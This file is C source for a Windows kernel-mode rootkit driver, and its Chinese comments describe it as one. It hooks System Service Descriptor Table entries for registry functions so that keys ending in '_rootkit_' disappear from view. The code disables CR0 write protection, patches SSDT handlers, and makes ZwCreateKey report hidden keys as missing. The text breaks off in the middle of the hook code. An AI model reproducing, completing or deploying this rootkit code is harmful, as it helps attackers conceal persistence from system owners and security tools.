hidereg.c

驱动类 rootkit HOOK注册表读取

/*///////////////////////////////////
通过HOOK 与注册表访问相关的函数 ZwEnumerateKey ZwEnumerateValueKey
来隐藏注册表的键和键值 设定为_rootkit_ 可以在283行 CheckByName()来修改
ineverland@163.com
/*///////////////////////////////////

#include "ntddk.h"

#include "zwfunc.h"
#include "stdio.h"
#include "stdlib.h"
#include <ctype.h>

static T_ZwCreateKey		Real_ZwCreateKey;
static T_ZwOpenKey		Real_ZwOpenKey;
static T_ZwEnumerateKey		Real_ZwEnumerateKey;
static T_ZwEnumerateValueKey	Real_ZwEnumerateValueKey;

#define MIN(x,y) ((x) < (y) ? (x) : (y))
#define MAXPATHLEN 1024

ULONG ServiceIdFromFn (PVOID pfnHandler);
PVOID HookSystemService (ULONG ulService, PVOID pfnNewHandler);
PVOID HookSystemServiceByFn (PVOID pfnHandler, PVOID pfnNewHandler);


#pragma pack(push, 1)
//未公开的数据结构
typedef struct {
	/*
	 * Table containing cServices elements of pointers to service handler
	 * functions, indexed by service ID.
	 */
	PVOID		*rgpfnHandlerTable;
	/*
	 * Table that counts how many times each service is used. This table
	 * is only updated in checked builds.
	 */
	PULONG		rgulCounterTable;
	/*
	 * Number of services contained in this table.
	 */
	ULONG		cServices;
	/*
	 * Table containing the number of bytes of parameters the handler
	 * function takes.
	 */
	PUCHAR		rguchParamTable;
} SSD, *PSSD;
#pragma pack(pop)


//内核导出 SSDT
__declspec(dllimport) SSD KeServiceDescriptorTable[4];


/*
 * Service ID numbers are stored as follows, from LSB to MSB:
 *	12 bit serveic (system call) number
 *	2 bitstem  syservice table number
 *	18 bits(r emrainde of ULONG) must be zero
 */
#define SSTForId(x) (((ULONG) x) >> 12)
#define IndexForId(x) (((ULONG) x) & 0xFFFUL)
#define ValidId(x) ((((ULONG) x) & ~0x3FFFUL) == 0UL)


/*
有函数名得到该函数在SSDT 里的索引
 */
ULONG ServiceIdFromFn (PVOID pfnHandler)
{
	PUCHAR	pbHandler;
	ULONG	ulService;

	pbHandler = (PUCHAR) pfnHandler;

	/* Check for MOV EAX, imm32 instruction */
	if (*pbHandler != 0xB8) {
		DbgPrint("ServiceIdFromFn(): Expected B8 got %02x",
			*pbHandler);
		return 0UL;
	}

	/* Get immediate destination operand of MOV instruction */
	ulService = *(PULONG) (pbHandler + 1);
	
	if (!ValidId (ulService)) {
		DbgPrint("ServiceIdFromFn(): Bogus service ID %08x",
			ulService);
		return 0UL;
	}

	return ulService;
}
////////////////////修改CRO寄存器来禁止内存读写保护限制
#define WPOFF() \
	_asm mov eax, cr0 \
	_asm and eax, NOT 10000H \
	_asm mov cr0, eax

#define WPON() \
	_asm mov eax, cr0 \
	_asm or eax, 10000H \
	_asm mov cr0, eax

/*
安装钩子的过程
 */
PVOID HookSystemService (ULONG ulService, PVOID pfnNewHandler)
{
	ULONG ulSST, ulIndex;
	PVOID *pfnHandler, pfnOldHandler;
	PSSD pDescriptor;

	if (!ValidId (ulService)) {
		DbgPrint ("HookSystemService(): Bogus service ID %08x",
			ulService);
		return NULL;
	}

	ulSST = SSTForId (ulService);
	ulIndex = IndexForId (ulService);

	/*
	 * Look up the service descriptor table entry and check that it
	 * contains the service index that is to be hooked.
	 */
	pDescriptor = &KeServiceDescriptorTable[ulSST];
	if (pDescriptor == NULL) {
		DbgPrint ("HookSystemService(): No descriptor for SST %x",
			ulSST);
		return NULL;
	}
	if (pDescriptor->cServices < ulIndex) {
		DbgPrint ("HookSystemService(): Index %03x exceeds service "
			"count of %03x for SST %x", ulIndex,
			pDescriptor->cServices, ulSST);
		return NULL;
	}

	pfnHandler = &pDescriptor->rgpfnHandlerTable[ulIndex];

	pfnOldHandler = *pfnHandler;
	/* 8000000-FFFFFFFF is the region of memory reserved for the OS */
	if (((ULONG)pfnOldHandler & 0x80000000UL) == 0) {
		DbgPrint ("HookSystemService(): Old handler %08x for SST %x "
			"index %03x is not in kernel region",
			(ULONG) pfnOldHandler, ulSST, ulIndex);
		/* return NULL */
	}

	DbgPrint ("HookSystemService(): Hooking SST %x Index %03x Old %08x",
		ulSST, ulIndex, (ULONG) pfnOldHandler);

	__try {
		WPOFF();
		pfnOldHandler = InterlockedExchangePointer (pfnHandler, pfnNewHandler);
		WPON();
	} __except (EXCEPTION_EXECUTE_HANDLER) {
		pfnOldHandler = pfnHandler;
		DbgPrint("HookSystemService(): Hook failed - can't write");
	}

	return pfnOldHandler;
}


//安装HOOK的 过程
PVOID HookSystemServiceByFn (PVOID pfnHandler, PVOID pfnNewHandler)
{
	ULONG ulService;

	ulService = ServiceIdFromFn (pfnHandler);
	if (ulService == 0UL)
		return NULL;

	return HookSystemService (ulService, pfnNewHandler);
}

//////////////////////////////////////////////////////////////////


NTKERNELAPI NTSTATUS ObQueryNameString (
	IN PVOID                        Object,
	IN OUT PUNICODE_STRING		Name,
	/* ^ this should strictly be PBOJECT_NAME_INFORMATION */
	IN ULONG                        MaximumLength,
	OUT PULONG                      ActualLength
);

//由句柄获得全名
BOOLEAN PathFromHandle (HANDLE hKey, PUNICODE_STRING lpszSubKeyVal, 
			PCHAR fullname)
{
	PVOID			pKey = NULL;
	ANSI_STRING		keyname;
	PCHAR			tmpname;
	PUNICODE_STRING		fullUniName;
	ULONG			actualLen;

	/* Allocate a temporary buffer */
	tmpname = ExAllocatePool (PagedPool, MAXPATHLEN);
	if (tmpname == NULL)
		/* Not enough memory */
		return FALSE;

	*fullname = *tmpname = '\0';


	
	if (NT_SUCCESS (ObReferenceObjectByHandle (hKey, 0, NULL, KernelMode, 
		&pKey, NULL)) && pKey != NULL) {

		fullUniName = ExAllocatePool (PagedPool, MAXPATHLEN * 2 + 
			2 * sizeof(ULONG));
		if (fullUniName == NULL) {
			
			ObDereferenceObject (pKey);
			ExFreePool (tmpname);
			return FALSE;
		}

		fullUniName->MaximumLength = MAXPATHLEN*2;
		if (NT_SUCCESS (ObQueryNameString (pKey, fullUniName, 
			MAXPATHLEN, &actualLen ))) {
			if (NT_SUCCESS (RtlUnicodeStringToAnsiString (
				&keyname, fullUniName, TRUE))) { 
				if(*keyname.Buffer != '\0') {
					if (*keyname.Buffer != '\\')
						strcpy (tmpname, "\\");
					else
						strcpy (tmpname, "");
					strncat (tmpname, keyname.Buffer, 
						MIN( keyname.Length, 
						MAXPATHLEN - 2 ));
				}
				RtlFreeAnsiString (&keyname);
			}
		}

		ObDereferenceObject (pKey);
		ExFreePool (fullUniName);
	}

	
	if (lpszSubKeyVal != NULL) {
		keyname.Buffer = NULL;
		if (NT_SUCCESS (RtlUnicodeStringToAnsiString (&keyname, 
			lpszSubKeyVal, TRUE))) {
			if (*keyname.Buffer != '\0') {
				strcat (tmpname, "\\");
				strncat (tmpname, keyname.Buffer,
					MIN(keyname.Length, MAXPATHLEN - 1 -
					strlen(tmpname)));
			}
			RtlFreeAnsiString (&keyname);
		}
	}

	strcpy (fullname, tmpname);
	ExFreePool (tmpname);

	return TRUE;
}





void RemoveRegistryHooks (void);

VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
{
	RemoveRegistryHooks();
	DbgPrint("OnUnload Routine called\n");
}



int CheckKeyByName(PCHAR szKeyName)
{
    PCHAR temp=szKeyName+(strlen(szKeyName)-9);
	if(!strncmp(temp,"_rootkit_",9))
		return 1;
     else
		 return 0;	
}


VOID AdjustKeyName (PCHAR szKeyName);
ULONG ServiceIdFromFn (PVOID pfnHandler);
PVOID HookSystemService (ULONG ulService, PVOID pfnNewHandler);
PVOID HookSystemServiceByFn (PVOID pfnHandler, PVOID pfnNewHandler);

/*
 * Hook of ZwCreateKey(); 
 */
NTSTATUS Hook_ZwCreateKey (
	OUT PHANDLE KeyHandle,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes,
	IN ULONG TitleIndex,
	IN PUNICODE_STRING Class OPTIONAL,
	IN ULONG CreateOptions,
	OUT PULONG Disposition OPTIONAL
)
{
	NTSTATUS rc;
	PCHAR szFullName;

	/* Find the full name of the key and check access on it */
	szFullName = ExAllocatePool (PagedPool, MAXPATHLEN);
	if (szFullName != NULL) {
		if (PathFromHandle (ObjectAttributes->RootDirectory, 
			ObjectAttributes->ObjectName, szFullName)) {
			AdjustKeyName (szFullName);
			if (CheckKeyByName (szFullName)) {
				ExFreePool (szFullName);
				return STATUS_NO_SUCH_FILE;
			}
		}
		ExFreePool (szFullName);
	}